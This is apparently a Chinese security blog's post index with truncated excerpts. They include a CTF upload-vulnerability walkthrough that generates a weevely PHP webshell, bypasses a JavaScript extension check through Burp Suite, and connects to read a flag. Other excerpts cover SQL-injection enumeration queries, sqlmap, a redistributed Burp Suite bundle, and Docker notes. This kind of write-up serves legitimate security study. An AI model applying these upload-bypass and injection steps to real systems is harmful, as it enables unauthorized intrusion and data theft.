上传漏洞
首先,标题是upload,提示就是上传漏洞无非就是js拦截,代码拦截,看了以下网页head头,发现js代码,关键字jpg burpsuite 抓包,配置代理 weevely 生成一句话 12weevely generate password ./1.php #use weevely在当前目录生成1.php,密码passwdmv 1.php 1.php.jpg 选择文件上传 && burpsuite 抓包 删掉.jpg 回显 upload success : upload/1592555994.1.php weevely 连接 12345weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely 连接dir # 显示目录cd ../..发现flag.phpcat flag.php 得到flag 推荐一个上传漏洞的靶场:https://github.com/c0ny1/upload-labs
安全笔记
开始学习查库:1select schema_name from information_schema.schemata 查表:1select table_name from information_schema.tables where table_schema='security' 查列:1select column_name from information_schema.columns where table_name='users' 查字段:1select username,password from...
随机笔记
按钮弹出文字 123456<script type="text/javascript"> function a(){ alert("有啥好看的"); } </script> <input type="button" value=按钮弹出文字 onClick="javascript:a()"> 表格 加粗 <strong> 倾斜 <em><i> 删除线 <del><s> 下划线 <ins><u> 盒子 <div 占一行><span 跨距> 图像 ...
Windows 安全渗透工具配置.MD
请在Windows环境变量中添加 存放脚本的文件夹路劲,建议 onedriver WIN + E >> 此电脑 > 属性 > 高级系统设置 > 高级 > 环境变量 > 系统变量 > PATH > 新建 > 存放脚本的路劲 工具推荐python换源 1pip config set global.index-url https://mirrors.aliyun.com/pypi/simple Wiresharkwireshark.org 安装的时候勾选一下拓展项目,优先安装 <img src=”https://xrsec.s3.bitiful.net/IMG/20201114191704207648.png?fmt=webp&q=48) Sqlmapgithub sqlmapproject/sqlmap 123456# sqlmap/lib/core/settings.py# 新版在第27行DEFAULT_USER_AGENT = 'Mozilla/5.0...
sqlmap的使用介绍
## 一、sqlmap获取目标推荐一篇文章:https://www.comparitech.com/net-admin/sqlmap-cheat-sheet/ 1.sql注入介绍所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将SQL命令注入到后台数据库引擎执行的能力,它可以通过在web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL注入可能发生在未知HTTP数据包中任意位置。创建本地服务后,访问子页面/sqli-labs,点击Less-1,加入参数**?id=2**,会返回登录名和密码到网页上,如图 2.SQL输出级别Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6。使用参数-v来指定某个等级,如使用参数 -v...
App exe 封装教程
jpackageBurp-Suite-Launch IdeaProjects/Burp-Suite-Launch/src/burpsuite/Main.java 12345678910111213141516171819202122232425262728293031323334353637383940414243package burpsuite;public class Main { public static void main(String[] args) { new Main().shell(); } public String getPath() { String path = this.getClass().getProtectionDomain().getCodeSource().getLocation().getPath(); if...
Burp-Suite 集合打包
预览 下载地址 百度云盘:skmh有无后门,请君自测 –💖 Windows Old-Burp-Suite.vbs Burp-Suite-Win.vbs license.cmd Linux Burp-Suite-Linux.sh Burp-Suite-Linux-Arm.sh 1./jdk-linux11/bin/java -noverify -jar BurpSuiteLoader.jar 1./jdk-linux-arm11/bin/java -noverify -jar BurpSuiteLoader.jar 建议配合 screen 或者 & 效果更佳 Mac Burp-Suite-Mac.zip 1234567vi /etc/profileGexport burpsuite=/Users/xr/Documents/Burp-Suiteexport PATH=$PATH:$burpsuite/:wqecho -e '$burpsuite/jdk-mac11/Contents/Home/bin/java -noverify...
天目MVC审计二
...
天目MVC审计一
前言 我们今天来从零开始审计一款CMS:天目CMS本文章由二农戏猪编辑 天目CMS 官网 MVC架构的了解 MVC架构一般包括三个部分:M是指业务模型,V是指用户界面,C则是控制器。具体情况大家可以百度查看。 根据我们对于MVC的了解。我一般有两种审计模式: 直接审计控制器也就C的内容,再追踪一些函数。全局搜索一下**filt__**,因为 filt 的英文意思为过滤,可以通过全局搜索这样式的函数来查看一下过滤规则。这种一般是比较快速审计。 但是这种情况一般建立在你可以清晰明白该款CMS的路由规则,适合老鸟,方便根据审计出来的漏洞的点去回溯验证 从index页面通读审计这种审计方式是我认为像我这样的菜鸡比较合适的。也不容易忽略一些漏洞。该篇文章就是以这种方式审计的! 开始审计准备在审计开始时,我一般习惯于观察一下目录列表,从而可以对整个CMS有一个大概的了解: 1234567app ----------------------------------- 主程序目录attachment ---------------------------- 附加目录public...
code-server code-server arm
请访问 最新版 已兼容 Mac M1 Run1234567891011121314151617docker run -it -d \--name vs-db \-p 31005:3306 \--hostname vs-db \-e "MYSQL_ROOT_PASSWORD=123456" \mariadb:latestdocker run -it -d \--name code-server \-v /yourpath/www/html:/www/wwwroot/html \-p 31001:8080 \-p 31002:22 \-p 31003:80 \-p 31004:5050 \--hostname code-server \--link vs-db \xrsec/code-server:arm 其他的配置参考 另外一篇文章Refer to another article for other configurations Thanks View initializationMake code-server12345678910docker run...
Phpstorm docker php74-56 nginx mariadb
Phpstorm 折磨的我头很大,难受 Docker 配置 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677version: "3"services: db: hostname: db image: mariadb:latest container_name: db restart: on-failure:3 volumes: - ./server/db:/var/lib/mysql ports: - 31004:3306 command: --transaction-isolation=READ-COMMITTED --binlog-format=ROW environment: -...
Docker命令
Docker 基本命令 1234docker imagesdocker login --username=user@qq.com registry.cn-hangzhou.aliyuncs.comdocker tag 23d07257d553 registry.cn-hangzhou.aliyuncs.com/user/awvs-nessus:latestdocker push registry.cn-hangzhou.aliyuncs.com/user/awvs-nessus:latest Docker 命令 1/usr/syno/sbin/synoservice --restart pkgctl-Docker 1docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]] 1docker commit id name 1docker-compose up -d 1docker exec -it 容器:/bin/bash 1docker logs 容器 1docker image puxxx -af #...
Docker搭建awvs和nessus
仓库来自雷石安全,联系侵删 同样推荐 国光blog 关于启动命令: 原版:需手动打开 nessusd 12345docker run -it -d \ -p 3443:3443 \ -p 8834:8834 \ --name=leishi \ leishianquan/awvs-nessus:v4 我使用的版本:同时打开 awvs 和 nessus 将下面代码保存为 awvs.sh 最后一行删除留空 12345678910#!/bin/bashsource /etc/profileecho "source file success"/bin/su acunetix /home/acunetix/.acunetix/start.sh & \echo "start acunetix success"/etc/init.d/nessusd start &echo "start nessusd success"echo...
Ubuntu 报错
E: Sub-process /usr/bin/dpkg returned an error code (1)12345678cd /var/lib/dpkg/sudo mv info/ info_baksudo mkdir infosudo apt-get updatesudo apt-get -f installsudo mv info/* info_bak/sudo rm -rf infosudo mv info_bak...
Kvm
12345virsh list --all #查看所有虚拟机virsh start kvm_name #启动虚拟机virsh shutdown kvm_name #关闭虚拟机virsh destroy kvm_name #销毁虚拟机virsh undefine kvm_name #删除虚拟机配置 12virt-manager -c 'qemu+ssh://nas/system?socket=/var/run/libvirt/libvirt-sock'virt-viewer -c 'qemu+ssh://nas/system?socket=/var/run/libvirt/libvirt-sock' XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all...